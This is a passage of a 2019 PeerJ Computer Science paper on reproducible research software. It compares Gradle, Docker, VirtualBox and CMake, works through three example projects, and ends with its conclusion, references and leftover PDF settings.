automation system. Gradle Gradle is a general purpose build tool based on Java and Groovy. Gradle integrates the build tools Maven as well as Ant and can replace or extend both systems. Main features of Gradle are the support for Maven repositories for dependency resolution and installation and the out of the box support for common tasks, that is, building, packaging and reporting. Gradle supports multiple programming languages, but has a strong focus on Java, especially as it is the recommended build system for Android development. An integrated wrapper system allows to use Gradle for building software artifacts without installing Gradle. Dependency installations and versions are maintained automatically. If a build requires a new version of a library, it is downloaded and installed automatically. The automated dependency installation is a great benefit of Gradle, although there are still some challenges to overcome. One issue is that automated dependency installation only works, if the required libraries are offered in an online repository. If the required dependency is removed from the online repository, building any software depending on this library becomes impossible. For other programming languages, tools with similar functionality are available, that is, the Node Package Manager for JavaScript projects or pip for Python projects. Docker The open source software Docker allows packaging software applications including code, system tools, and system libraries into a single Docker image. The resulting image can be published, downloaded and executed on various systems without operating system restrictions in a virtualized environment. This way, an application embedded in a Docker image will execute in a predefined way, independent of the software environment installed on the host computer. The only requirement for the host system is the installed Docker engine. A Docker image is a kind of lightweight virtual machine image. It could contain the runtime environment for a single application with or without graphical user interface, but it could also contain a ready to deploy server application for web services or even environments for heavy calculations or simulations. When running the Docker image, a Docker container is launched. A Docker container can be seen as an isolated runtime Elmenreich et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.240 15/27 http://dx.doi.org/10.7717/peerj-cs.240 https://peerj.com/computer-science/ environment, which uses the kernel of the host operating system and thereby becomes more lightweight than traditional virtual machines. A running Docker container can be accessed via a terminal or a graphical user interface allowing for a broad range of applications. Docker images can be shared in two different ways. The first way is to export a running container including all files and executables as image and to share it as a single file. This file can be large in size but is fast to launch by others. The second way is to create a so-called Dockerfile. Dockerfiles contain the building instructions for Docker images. These instructions include commands for installing required dependencies and for installing the shared software artifact itself. When building a Docker image from a Dockerfile, all instructions from the Dockerfile are automatically executed. This leads to a small Dockerfiles, but a more complex import process. In addition, when using Dockerfiles, all dependencies need to be available either in online repositories, or locally on the machine building the image. The commercial Docker Hub platform (https://hub.docker.com/, last visited 2019-10-10) streamlines the process for sharing Docker images. Docker provides tools to share images on Docker Hub and to download images from Docker Hub via the command-line. Docker Hub offers the possibility of sharing public Docker images without download restrictions for free, but also paid plans allowing creating private repositories for sharing images among small groups. The major difference between Docker and the previously presented tools is that Docker is not usually used for the development of an artifact. In most cases, a Docker image is created for sharing a predefined environment in a team. This means that the image is created and the software artifact is deployed in the container afterward. An alternative to Docker is using Linux containers, which allow to run multiple isolated Linux systems on a single host. VirtualBox VirtualBox is an open source software for the virtualization of an entire operating system. VirtualBox emulates a predefined hardware environment, where multiple operation systems, like Windows, Mac OS, and most Unix Systems can be installed. The installed operating system is stored as persistent image, which allows the installation and configuration of software. Once the image is created, it can be shared and executed on multiple machines. As mentioned before, VirtualBox emulates the entire hardware of a computer resulting in higher execution overhead as well as higher setup effort. Before the scientific software artifact can be installed in a VirtualBox container, an operating system and all dependencies have to be installed. A non-open source alternative to VirtualBox is VMWare, which has similar functionality. Comparison of analyzed tools After the presentation of selected tools in the last section, we now want to compare their features for sharing scientific software artifacts. As criteria for the comparison, we focus in this section on important aspects of software for researchers, according to the survey Elmenreich et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.240 16/27 https://hub.docker.com/ http://dx.doi.org/10.7717/peerj-cs.240 https://peerj.com/computer-science/ presented in the section “Survey”. Table 2 briefly summarizes our findings; a description of each criteria is found throughout this section. The ratings in Table 3 are based on qualitative comparisons, as well as on our experience from using the tools for making three different research projects reproducible, as elaborated in the section “Examples”. Security As indicated by the survey, local computer and data security is a major concern for many researchers. Some software artifacts require administrator access rights on the local machine in order to be executed. These access rights allow malicious behavior, which could lead to unwanted consequences on the local machine or on the local network. VirtualBox and Docker execute software artifacts in sandboxed environments and therefore allow the secure execution of software artifacts. Tools like CMake and Gradle do not offer this security mechanism. When executing a shared software artifact from untrusted sources, a sandboxed environment is recommended. Supported platforms CMake, Docker, and VirtualBox are compatible with most Linux platforms, recent versions of MacOS, and selected versions of Windows 10. Gradle works as long as the Java Virtual Machine is available. Besides this platform support it has to be kept in mind that the software artifacts itself could require a certain operating system. This problem can be mitigated through virtualization of Docker and VirtualBox. Required knowledge for sharing If a build management tool is used in the development of a scientific software artifact, we assume that the researchers are familiarized with the build management tool during the development phase. Therefore, no additional knowledge for the researcher who is sharing the artifact is required. VirtualBox also does not require a lot of additional background information. Everybody who is able to install an operating system is able to share a software artifact embedded in a VirtualBox image. The terminology of Docker seems to be confusing at first glance, requiring some time to become familiar with Docker concepts. Table 2 Comparison of tools for sharing scientific software artifacts. Tool CMake Gradle Docker VirtualBox Security No security mechanisms No security mechanisms Sandboxed environment Sandboxed environment Supported platforms Linux, MacOS, Windows Java VM Linux, MacOS, Windows Linux, MacOS, Windows Required knowledge for sharing Little Little Moderate Little Effort for sharing Little Little Moderate High Required knowledge for installation and execution Moderate Moderate Little Little Effort for installation and execution Moderate/high Little Little Little Size of shared object Small Small Up to multiple GBs Up to multiple GBs Limitations Installation could be exhausting Specific Gradle project structure recommended GUI requires extra effort Images always include the entire operating system Elmenreich et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.240 17/27 http://dx.doi.org/10.7717/peerj-cs.240 https://peerj.com/computer-science/ Effort for sharing CMake, Gradle, and other build management systems are intended to define a standardized build process. If a build management system is used during the development of the scientific software artifact, no additional effort arises for sharing. The configuration file for the build management system can be shared along the source code of the software artifact. Docker and VirtualBox are usually not directly involved in software development. In most cases, a Docker or VirtualBox image has to be created explicitly for sharing the software artifact. The structured process of building a Docker container allows easy reuse of existing Docker containers for other software artifacts. In the case of VirtualBox, the whole VirtualBox image has to be shared on a file server. Docker images can be shared on the free to use Docker Hub or on a file server. Alternatively, a Dockerfile, which contains the building instructions for a Docker image, can be created and shared as a text file. However, using a Dockerfile requires all dependencies being available in repositories, adding additional complexity to the overall process. Required knowledge for installation and execution Researchers are often not familiar with the tools used for the creation of software artifacts. Reading the documentation of build management tools can be exhausting and time- consuming for the short test of an artifact. CMake and Gradle require some knowledge in order to build a software artifact, especially if errors appear. VirtualBox and Docker are easier to use. If a Docker image is hosted on DockerHub, a single command is sufficient for downloading and running the image. If this command is provided, no additional knowledge is required. Due to a graphical user interface, running a VirtualBox image is even easier. Effort for installation and execution According to the survey results, ease of installation is a major consideration for most researchers (104 of 125 participants). Regarding the installation of the used tool itself, Gradle has the lowest requirements. The Gradle Wrapper allows installing dependencies and the build of artifacts without installing Gradle itself. For installing and executing the shared software artifact, the highest effort arises when using CMake, where required dependencies have to be installed manually. For building and executing software artifacts with Gradle only a few commands are required. Docker and VirtualBox require the least effort; the shared image only needs to be executed. Size of shared object When using CMake or Gradle, the source code of the software artifact and the configuration file of the build management tool have to be shared, which usually leads to small shared objects. The shared image of Docker or VirtualBox has to contain the source code and all other tools which are required for execution, such as the operating system. This results in large shared objects, in some cases the size of a Docker image exceeds one Gigabyte. Elmenreich et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.240 18/27 http://dx.doi.org/10.7717/peerj-cs.240 https://peerj.com/computer-science/ Alternatively, Docker provides an option allowing for smaller shared objects— Dockerfiles. A Dockerfile contains only text instructions for building a Docker image. Therefore, the size of a Dockerfile is only a few kilobytes, but once executed, Docker automatically pulls the artifact’s source code from provided repositories and builds the software artifact, resulting in a large Docker image on the local machine. Nevertheless, the size of the download is not a major concern for the majority of the survey participants. Limitations All analyzed tools have limitations. CMake is a lightweight tool for software development, but the effort for installing the dependencies of a software artifact could be extensive. Furthermore, it is only applicable for a handful of programming languages such as C or C++. When Gradle is chosen as build system early in the development phase, it is perfectly suited for Java projects. Using Gradle for existing projects can be cumbersome because it requires additional configuration for projects that do not comply with Gradle’s default project structure. Especially for researchers that are not familiar with Gradle, the time spent for this additional configuration step should not be neglected. Docker is perfectly suited for command-line or web applications, which is the case for a huge amount of scientific software artifacts. Additional configuration is required to support GUIs of desktop applications. FREVO (see the section “FREVO”), used in one of our examples, demonstrates GUI support for desktop applications with Docker. VirtualBox is applicable for all types of software artifacts, but the overhead of creating and sharing a VirtualBox image could be huge. For sharing an artifact, independent of its size and complexity, a complete operating system has to be installed and shared. EXAMPLES After introducing background information in the last sections, three examples are presented analyzing the applicability of various tools for sharing software artifacts. Three scientific artifacts from different computer science research areas allowed us to focus on various types of artifacts with different build systems and procedures for sharing. The first example—Stochastic Adaptive Forwarding—is a simulation scenario, which can be executed on a command line in order to conduct performance evaluations. Second, FREVO is a simulation tool, mainly controlled via a graphical user interface. The third example—LireSolr—is a server-based application used for image retrieval. Stochastic Adaptive Forwarding Stochastic Adaptive Forwarding (SAF) (Posch, Rainer & Hellwagner, 2017) is a forwarding strategy for the novel Internet architecture Named data networking (NDN) (Zhang et al., 2014). Forwarding strategies in NDN are responsible for forwarding packets to neighboring nodes and therefore select the paths of traffic flows in the network. The Network Forwarding Daemon (NFD) implements the networking functionalities of NDN. It is written in C++ and uses the WAF build automation system. The network simulator ns-3/ndnSIM (Mastorakis et al., 2016) is used for testing purposes, which also uses the WAF build system. For testing SAF in the simulation environment three steps are required: (i) Installation of the NFD; (ii) installation of the network simulator Elmenreich et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.240 19/27 http://dx.doi.org/10.7717/peerj-cs.240 https://peerj.com/computer-science/ ns-3/ndnSIM and finally (iii) patching SAF into a compatible version of the NFD. The installation of SAF was tested and analyzed in the standard way by using WAF and Docker. SAF with WAF The standard way of developing NDN forwarding strategies is by using the WAF build automation system. The functionality of the WAF build system is similar to the functionality of CMake. This means that WAF automatically resolves dependencies, but the installation of dependencies must be performed manually. Although extensive installation instructions were published (https://github.com/danposch/SAF, last visited 2019-07-08), it is tricky to install the simulator and its dependencies. Furthermore, there are slightly undocumented differences when installing the NDN framework on different Unix versions. Once the NDN framework is compiled in the correct version, it is easy to patch SAF. Nevertheless, it can take up to several hours to initially install and compile the NDN framework with SAF. SAF with Docker Named data networking and SAF are licensed under GPL V3, meaning that there are no legal concerns over packaging the software. Technically, Docker provides two options for creating and sharing images. The first is to check out a preconfigured image like Ubuntu Linux from the Docker website and connect to it via terminal. All required changes can be made in the terminal and finally persisted with a commit. The altered image can be shared via the Docker website or as binary file. The second possibility to create the image is by using Dockerfiles. These files contain simple creation instructions for images and can be shared easily due to their small size. To build an image, the Dockerfile can be executed on any host with the Docker framework installed. Both variants were tested for SAF. The resulting images, containing all dependencies and the compiled software artifacts, have a size of about 4.6 GB with the size of the Dockerfile being about two KB. Using the precompiled image (https://hub.docker.com/r/ phmoll/safprebuild/, last visited 2019-07-08), running the image only takes an instant. The execution of the Dockerfile takes, depending on the Internet connection and the computing power of the host system, between 15 and 60 min. Once the image is running, the results of the paper can be reproduced or new experiments with SAF can be conducted using the provided network simulator. FREVO FREVO (Sobe, Fehérvári & Elmenreich, 2012) is an open source framework to help engineers and scientists in evolutionary design or optimization tasks to create a desired swarm behavior. The major feature of FREVO is the component-wise decomposition and separation of the key building blocks for an optimization task. This structure enables the components to be designed separately allowing the user to easily swap and evaluate different configurations and methods or to connect an external simulation tool. FREVO is typically used for evolving swarm behavior for a given simulation (Fehervari & Elmenreich, 2010; Monacchi, Zhevzhyk & Elmenreich, 2014). FREVO is a mid-sized project with 50k lines of mostly Java code, having a graphical interface as well as a mode for pure command line operation, for example, to be used on a simulation server. Elmenreich et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.240 20/27 https://github.com/danposch/SAF https://hub.docker.com/r/phmoll/safprebuild/ https://hub.docker.com/r/phmoll/safprebuild/ http://dx.doi.org/10.7717/peerj-cs.240 https://peerj.com/computer-science/ The component-based structure allows to easily extend and remove components (e.g., a simulation, a type of neural network, an optimization algorithm), which sometimes creates some effort in newly setting up FREVO. FREVO was tested and analyzed with the following three tools: FREVO with build script Until recently, FREVO was provided as a download zip file (http://frevo.sourceforge.net/, last visited: 2019-07-08) that included sources of the main program and additional components together with an ant build file. However, there had been problems in the past with different language versions of Java. A further problem can be dependencies on third party tools or libraries, which are not automatically maintained by this type of build script. FREVO with Gradle An analysis showed that the current structure of FREVO, especially due to its component- plug-in-architecture, conflicts with the expected and possible project structure for Gradle. FREVO with Docker Since FREVO and its components are open source under GPL V3, there was neither a legal nor a technical problem to put it into a virtual Docker container. We used an Ubuntu Linux system that was provided by Docker. Openjdk8 was installed as Java Runtime environment. After installing FREVO in the Docker system, it was pushed onto the free Docker Hub hosting platform (https://hub.docker.com/r/frodewin/frevo/, last visited: 2019-07-08). To reproduce a result made with FREVO it thus possible to (given that Docker is installed) download and execute the respective Docker container. In general, the result was easily usable, apart from some effort to get a graphical display working. The parallelization of simulation, which is a natural ability of FREVO, works fine as well inside a Docker container. The Docker image containing FREVO has a compressed size of 223 MB, which is mostly due to the files of Ubuntu Linux. LireSolr LireSolr (Lux & Macstravic, 2014) is an extension for the popular Apache Solr (http://lucene.apache.org/solr/, last visited 2019-07-08) text retrieval server to add functionality for visual information retrieval. It adds support for indexing and searching images based on image features and is for instance in use by the World Intellectual Property Organisation, a UN agency, within the Global Brand DB (http://www.wipo.int/ branddb/en/, last visited 2019-07-08) for retrieval of similar visual trademarks. LireSolr brings the functionality of the LIRE library (Lux & Marques, 2013) to the popular search server. While LIRE is a library for visual information retrieval based on inverted indexes, it is research driven and intented to be integrated with local Java applications. Apache Solr is more popular than the underlying inverted index system, Lucene, as it allows to modularize retrieval functionality by providing a specific retrieval server with cloud functionality and multiple APIs to access it for practical use. LireSolr is intended for people who need out of the box visual retrieval methods without the need for integrating a library in their applications. It can be called from any mobile, Elmenreich et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.240 21/27 http://frevo.sourceforge.net/ https://hub.docker.com/r/frodewin/frevo/ http://lucene.apache.org/solr/ http://www.wipo.int/branddb/en/ http://www.wipo.int/branddb/en/ http://dx.doi.org/10.7717/peerj-cs.240 https://peerj.com/computer-science/ server or desktop platform and runs on systems with a Java 8 runtime. This flexibility is valued among researchers as well as practitioners. LireSolr is hosted on Github (https://github.com/dermotte/liresolr, last visited 2019-07-08). Gradle and Docker build files are part of the repository. LireSolr with Gradle The standard method of building LireSolr is by using Gradle. Current IDEs can import Gradle build files; any task can be done from within the IDE. While Gradle makes sure that the right version for each library is downloaded and everything is ready to build, installing the new features to the Solr server has to be done manually. The supporting task in Gradle just exports the necessary JAR files. The user or developer has to install Solr, then create a Solr core, change two configuration files, copy the JARs and restart the server to complete the installation. While these steps are extensively described in the documentation, it still presents a major effort for new users without prior experience of retrieval in general or using Apache Solr. LireSolr with Docker As LireSolr is extending Solr by adding additional functionality, the intuitive way to create a Docker container is to extend the Solr Docker container. The Dockerfile defining the build of the Docker container is part of the LireSolr repository, where a specific Gradle task is building and preparing relevant files for the creation of the image. This includes the aforementioned JARs and config files as well as a pre prepared Solr core and a small web application as a client. The Docker container can easily be run and provides basic functionality for digital image search. Developers who just want to test LireSolr can get it running within seconds using Docker Hub (https://hub.docker.com/r/dermotte/liresolr/, last visited: 2019-07-08). ONE TOOL TO REPRODUCE THEM ALL? In the previous sections, we presented tools for sharing software artifacts and examples showing how the tools can be applied in order to share scientific software artifacts. In this section, we now reflect on the advantages and shortcomings of the tools with respect to the results from our survey presented in the section “Survey”. Each of the presented tools has its pros and cons. For instance, the additional effort for sharing an artifact when using a build management tool is very low because in most cases a build management tool is used during the creation of the artifact. In contrast, it can be challenging and time-consuming for other researchers to get the build management tool up and running because required dependencies or the installation process may not be documented in detail. Software artifacts, which are provided as virtualized containers are easy to run and provide a high degree of security but are inconvenient in case a researcher wants to build upon previously published software artifacts. When weighing these advantages and shortcomings we quickly see that the one tool to reproduce all our scientific results does not exist. Nevertheless, based on our findings from the survey we now want to give recommendations for creating reproducible results and scientific software artifacts which can be easily used by other researchers. Elmenreich et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.240 22/27 https://github.com/dermotte/liresolr https://hub.docker.com/r/dermotte/liresolr/ http://dx.doi.org/10.7717/peerj-cs.240 https://peerj.com/computer-science/ The survey clearly showed that many researchers are interested in building their research on the work of others, which becomes much easier, when published software artifacts can be reused. Furthermore, we saw that the average time researchers are willing to invest to get artifacts running is only about two days. Thus, we assume that it is very important for researchers to get the artifact running quickly, otherwise, researchers lose interest in using the artifact and start developing their own solution. When taking the demand for security into account, we see that virtualized containers appear to be a good choice. The provided software artifact can be executed without the overhead of installing it, by simply running the container. Furthermore, it is possible to become familiar with the artifact in the virtualized environment and check if the artifact is suitable to base own work on it. Our findings mostly discuss the researchers’ perspective working on original research questions. The role of a reviewer in a peer review process has not be discussed in the same detail, but we assume that it is similar to researcher’s demands, but with even more demanding time constraints. When researchers decide to build on the artifact, it may be cumbersome to continue using a virtualized container, because altering a software artifact is more convenient on a local system. This means that the researcher has to install the artifact locally, without virtualized container. According to our study, researchers currently prefer providing detailed instructions and build tools. Solely relying on this information, it could be challenging to install the artifact, as already discussed. Dockerfiles are one solution to overcome this issue. As already explained, a Dockerfile is a kind of a construction guideline for Docker containers. It contains all command line directives, which are required to build a Docker container and can therefore be seen as exact procedure for the local installation of an artifact. Following the commands listed in the Dockerfile, local installation of a software artifact is relatively easy. These commands ensure that all dependencies are installed correctly, otherwise it would not be possible to create a Docker container. This means that by providing a Dockerfile, both options become possible, software artifacts can be executed in a secure container, but can also be easily installed by following instructions from the Dockerfile. Another finding of our survey is that the long-term availability of software artifacts is important for researchers and should be around 10 years. In addition, the ACM Artifact Reviewing and Badging guideline (https://www.acm.org/publications/policies/ artifact-review-badging, last visited 2019-07-08) emphasizes the importance of being able to reproduce results after a long time, by providing a separate badge for artifacts which are archived in archival repositories. When looking at our presented tools, we can see technical, as well as legal issues on the way to achieve long term availability. Although services, such as Code Ocean (https://codeocean.com/, last visited 2019-07-08) or Dryad (https://datadryad.org/, last visited 2019-07-08), are available for archiving software artifacts, the following points should be kept in mind. Tools such as Gradle rely on online repositories for downloading required dependencies. If only one of the required dependencies becomes unavailable, the build fails. This means that all dependencies, as well as all required tools have to be included when the artifact is archived. This leads to technical issues, because the Elmenreich et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.240 23/27 https://www.acm.org/publications/policies/artifact-review-badging https://www.acm.org/publications/policies/artifact-review-badging https://codeocean.com/ https://datadryad.org/ http://dx.doi.org/10.7717/peerj-cs.240 https://peerj.com/computer-science/ amount of required tools to reproduce a result could be tremendously high. For instance, if a required operating system or compiler is no longer available, the results can not be reproduced, which means that even these tools must to be archived. Besides this technical issue, packaging these tools could lead to legal issues as well when tools with limiting licenses are used. Furthermore, operators of platforms for archiving software could decide to discontinue service. This would result in loss of all artifacts archived by this provider. CONCLUSION This article reflects on the reproducibility of research results in computer science. We collected the opinions and requirements of 125 researchers via an online survey. Focusing on our research question RQ1 (“To what extent is reproducibility of results based on software artifacts important in the field of computer science and in related research areas?”), analysis of the survey’s results confirmed our initial assumption that the reproducibility of research results is an important concern in computer science research. Besides, researchers not only want to reproduce results but also want to base their work on the results of others. The main reasons for the importance of reproducibility are improved credibility and improved understanding of results. Using established commercial models, as they are common for scientific publications, was seen as critical. Moreover, the majority of survey participants showed a willingness to use open source tools for making their results accessible and reproducible. Based on the researchers’ opinions, we created guidelines which aid researchers in making their research reproducible. The applicability of various tools for publishing software artifacts was discussed while keeping our guidelines in mind. Scientific artifacts of different research areas in computer science were used to test the applicability of discussed tools for sharing reproducible research. Regarding research question RQ2 (“What tools can be used to support reproducibility?”), we identified a conflict between comprehensibility and simplicity of using a tool vs security measures avoiding to compromise one’s system when testing foreign code. Available tools provide a variety of possible solutions, however, we could not identify a single tool fulfilling all requirements. Finally, we discussed our findings and concerns on the process of publishing reproducible research. According to our study, the long-term availability of reproducible results is of great importance to many researchers, but we identified open issues in achieving availability for longer periods. Even if reproducibility of research is not common practice yet, we recognized a strong positive shift toward reproducible research, backed not only by individual researchers, but also by renowned scientific journals and publishers. With this work already leading to new insights regarding reproducibility, it also installs a beachhead for future research. With the survey as input and the discussions regarding the interpretation we identified the context of a researcher as a hypothetically highly influential factor on the view on reproducibility. So how do for instance not only cultural, geographical, and project background of a researcher, but also the research area as well as the research communities influence the willingness to investigate extra time in making results reproducible? Future work could also address the question whether and to what extend project size would influence the willingness to invest time into reproducing work. Elmenreich et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.240 24/27 http://dx.doi.org/10.7717/peerj-cs.240 https://peerj.com/computer-science/ ACKNOWLEDGEMENTS We would like to thank all participants of the survey for their valuable input and all colleagues who helped us by sharing their practical experience and discussion. We thank the anonymous reviewers for their constructive comments on a previous version of the article. We are grateful to Lizyy Dawes for proofreading an earlier version of this article. ADDITIONAL INFORMATION AND DECLARATIONS Funding This work was supported by the Austrian Science Fund (FWF) under the CHIST-ERA project 496 CONCERT (project no. I1402). There was no additional external funding received for this study. The funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. Grant Disclosures The following grant information was disclosed by the authors: Austrian Science Fund (FWF) under the CHIST-ERA project 496 CONCERT: I1402. Competing Interests The authors declare that they have no competing interests. Author Contributions � Wilfried Elmenreich conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, performed the computation work, authored or reviewed drafts of the paper, approved the final draft. � Philipp Moll conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, prepared figures and/or tables, performed the computation work, authored or reviewed drafts of the paper, approved the final draft. � Sebastian Theuermann conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, performed the computation work, authored or reviewed drafts of the paper, approved the final draft. � Mathias Lux conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, prepared figures and/or tables, performed the computation work, authored or reviewed drafts of the paper, approved the final draft. Data Availability The following information was supplied regarding data availability: Links to the tools used are available in the article. This includes data and code produced by us as well as code from others where we have built upon. Elmenreich et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.240 25/27 http://dx.doi.org/10.7717/peerj-cs.240 https://peerj.com/computer-science/ The following repositories contain parts deposited for the article: Docker Images: https://hub.docker.com/r/phmoll/saf-prebuild/ https://hub.docker.com/r/dermotte/liresolr/ https://hub.docker.com/r/frodewin/frevo/ We used a version of FREVO software, Sourceforge: http://frevo.sourceforge.net/. Supplemental Information Supplemental information for this article can be found online at http://dx.doi.org/10.7717/ peerj-cs.240#supplemental-information. REFERENCES Allen A, Schmidt J. 2015. Looking before leaping: creating a software registry. Journal of Open Research Software 3(1):e15 DOI 10.5334/jors.bv. Arbona A, Artigues A, Bona-Casas C, Massó J, Miñano B, Rigo A, Trias M, Bona C. 2013. Simflowny: a general-purpose platform for the management of physical models and simulation problems. Computer Physics Communications 184(10):2321–2331 DOI 10.1016/j.cpc.2013.04.012. Boettiger C. 2015. An introduction to docker for reproducible research. SIGOPS Operating Systems Review 49(1):71–79. Bonaventure O. 2017. The january 2017 issue. SIGCOMM Computer Communication Review 47(1):1–3. Brinckman A, Chard K, Gaffney N, Hategan M, Jones MB, Kowalik K, Kulasekaran S, Ludäscher B, Mecum BD, Nabrzyski J, Stodden V, Taylor IJ, Turk MJ, Turner K. 2018. Computing environments for reproducibility: capturing the “whole tale”. Future Generation Computer Systems 94:854–867 DOI 10.1016/j.future.2017.12.029. Casadevall A, Fang FC. 2010. Reproducible science? Infection and Immunity 78(12):4972–4975. Chirigati F, Shasha D, Freire J. 2013. Reprozip: using provenance to support computational reproducibility. In: Proceedings of the 5th USENIX Workshop on the Theory and Practice of Provenance, TaPP ’13. Berkeley: USENIX Association, 1:1–1:4. Cito J, Ferme VC, Gall H. 2016. Using docker containers to improve reproducibility in software and web engineering research. In: 2016 IEEE/ACM 38th International Conference on Software Engineering Companion (ICSE-C). New York: ACM, 609–612. Fehervari I, Elmenreich W. 2010. Evolving neural network controllers for a team of self-organizing robots. Journal of Robotics 2010:10 DOI 10.1155/2010/841286. Flittner M, Mahfoudi MN, Saucez D, Wählisch M, Iannone L, Bajpai V, Afanasyev A. 2018. A Survey on Artifacts from CoNEXT, ICN, IMC, and SIGCOMM Conferences in 2017. SIGCOMM Computer Communication Review 48(1):75–80. Hanson B, Sugden A, Alberts B. 2011. Making data maximally available. Science 331(6018):649 DOI 10.1126/science.1203354. Janin Y, Vincent C, Duraffort R. 2014. Care, the comprehensive archiver for reproducible execution. In: Proceedings of the 1st ACM SIGPLAN Workshop on Reproducible Research Methodologies and New Publication Models in Computer Engineering, TRUST ’14. New York: ACM, 1:1–1:7. Elmenreich et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.240 26/27 https://hub.docker.com/r/phmoll/saf-prebuild/ https://hub.docker.com/r/dermotte/liresolr/ https://hub.docker.com/r/frodewin/frevo/ http://frevo.sourceforge.net/ http://dx.doi.org/10.7717/peerj-cs.240#supplemental-information http://dx.doi.org/10.7717/peerj-cs.240#supplemental-information http://dx.doi.org/10.5334/jors.bv http://dx.doi.org/10.1016/j.cpc.2013.04.012 http://dx.doi.org/10.1016/j.future.2017.12.029 http://dx.doi.org/10.1155/2010/841286 http://dx.doi.org/10.1126/science.1203354 http://dx.doi.org/10.7717/peerj-cs.240 https://peerj.com/computer-science/ Lux M, Macstravic G. 2014. The LIRE request handler: a Solr plug-in for large scale content based image retrieval. In: Gurrin C, Hopfgartner F, Hurst W, Johansen H, Lee H, O’Connor N, eds. MultiMedia Modeling: 20th Anniversary International Conference, MMM 2014, Dublin, Ireland, January 6-10, 2014. Cham: Springer International Publishing, 374–377. Lux M, Marques O. 2013. Visual information retrieval using Java and LIRE. Synthesis Lectures on Information Concepts, Retrieval, and Services 5(1):1–112. Mastorakis S, Afanasyev A, Moiseenko I, Zhang L. 2016. ndnSIM 2: an updated NDN simulator for NS-3. Technical Report NDN-0028, Revision 2, NDN. McMurdie PJ, Holmes S. 2013. phyloseq: an R package for reproducible interactive analysis and graphics of microbiome census data. PLOS ONE 8(4):1–11 DOI 10.1371/journal.pone.0061217. Monacchi A, Zhevzhyk S, Elmenreich W. 2014. HEMS: a home energy market simulator. Computer Science—Research and Development 31(3):111–118. Morin A, Urban J, Adams PD, Foster I, Sali A, Baker D, Sliz P. 2012. Shining light into black boxes. Science 336(6078):159–160 DOI 10.1126/science.1218263. Peng RD. 2011. Reproducible research in computational science. Science 334(6060):1226–1227 DOI 10.1126/science.1213847. Poline J-B, Breeze JL, Ghosh S, Gorgolewski K, Halchenko YO, Hanke M, Haselgrove C, Helmer KG, Keator DB, Marcus DS, Poldrack RA, Schwartz Y, Ashburner J, Kennedy DN. 2012. Data sharing in neuroimaging research. Frontiers in Neuroinformatics 6:9 DOI 10.3389/fninf.2012.00009. Posch D, Rainer B, Hellwagner H. 2017. SAF: stochastic adaptive forwarding in named data networking. IEEE/ACM Transactions on Networking 25(2):14 DOI 10.1109/TNET.2016.2614710. Ram K. 2013. Git can facilitate greater reproducibility and increased transparency in science. Source Code for Biology and Medicine 8(1):7 DOI 10.1186/1751-0473-8-7. Shrader-Frechette K, Oreskes N. 2011. Symmetrical transparency in science. Science 332(6030):663–664 DOI 10.1126/science.332.6030.663. Sobe A, Fehérvári I, Elmenreich W. 2012. FREVO: a tool for evolving and evaluating self- organizing systems. In: Proceedings of the 1st International Workshop on Evaluation for Self-Adaptive and Self-Organizing Systems, Lyon. 105–110. Steiniger S, Hunter AJ. 2013. The 2012 free and open source GIS software map—a guide to facilitate research, development, and adoption. Computers, Environment and Urban Systems 39:136–150 DOI 10.1016/j.compenvurbsys.2012.10.003. Vitek J, Kalibera T. 2011. Repeatability, reproducibility and rigor in systems research. In: Proceedings of the 11th International Conference on Embedded Software EMSOFT 2011, Taipei. 33–38. Walters WP. 2013. Modeling, informatics, and the quest for reproducibility. Journal of Chemical Information and Modeling 53(7):1529–1530 DOI 10.1021/ci400197w. Witten DM, Tibshirani R. 2013. Scientific research in the age of omics: the good, the bad, and the sloppy. Journal of the American Medical Informatics Association 20(1):125–127 DOI 10.1136/amiajnl-2012-000972. Zhang L, Afanasyev A, Burke J, Jacobson V, Claffy K, Crowley P, Papadopoulos C, Wang L, Zhang B. 2014. Named data networking. SIGCOMM Computer Communication Review 44(3):66–73. Elmenreich et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.240 27/27 http://dx.doi.org/10.1371/journal.pone.0061217 http://dx.doi.org/10.1126/science.1218263 http://dx.doi.org/10.1126/science.1213847 http://dx.doi.org/10.3389/fninf.2012.00009 http://dx.doi.org/10.1109/TNET.2016.2614710 http://dx.doi.org/10.1186/1751-0473-8-7 http://dx.doi.org/10.1126/science.332.6030.663 http://dx.doi.org/10.1016/j.compenvurbsys.2012.10.003 http://dx.doi.org/10.1021/ci400197w http://dx.doi.org/10.1136/amiajnl-2012-000972 http://dx.doi.org/10.7717/peerj-cs.240 https://peerj.com/computer-science/ Making simulation results reproducible-Survey, guidelines, and examples based on Gradle and Docker Introduction Related Work Survey Requirements and General Guidelines Existing Tools Examples One Tool to Reproduce Them All? Conclusion flink9 References << /ASCII85EncodePages false /AllowTransparency false /AutoPositionEPSFiles true /AutoRotatePages /None /Binding /Left /CalGrayProfile (Dot Gain 20%) /CalRGBProfile (sRGB IEC61966-2.1) /CalCMYKProfile (U.S. Web Coated \050SWOP\051 v2) /sRGBProfile (sRGB IEC61966-2.1) /CannotEmbedFontPolicy /Warning /CompatibilityLevel 1.4 /CompressObjects /Off /CompressPages true /ConvertImagesToIndexed true /PassThroughJPEGImages true /CreateJobTicket false /DefaultRenderingIntent /Default /DetectBlends true /DetectCurves 0.0000 /ColorConversionStrategy /LeaveColorUnchanged /DoThumbnails false /EmbedAllFonts true /EmbedOpenType false /ParseICCProfilesInComments true /EmbedJobOptions true /DSCReportingLevel 0 /EmitDSCWarnings false /EndPage -1 /ImageMemory 1048576 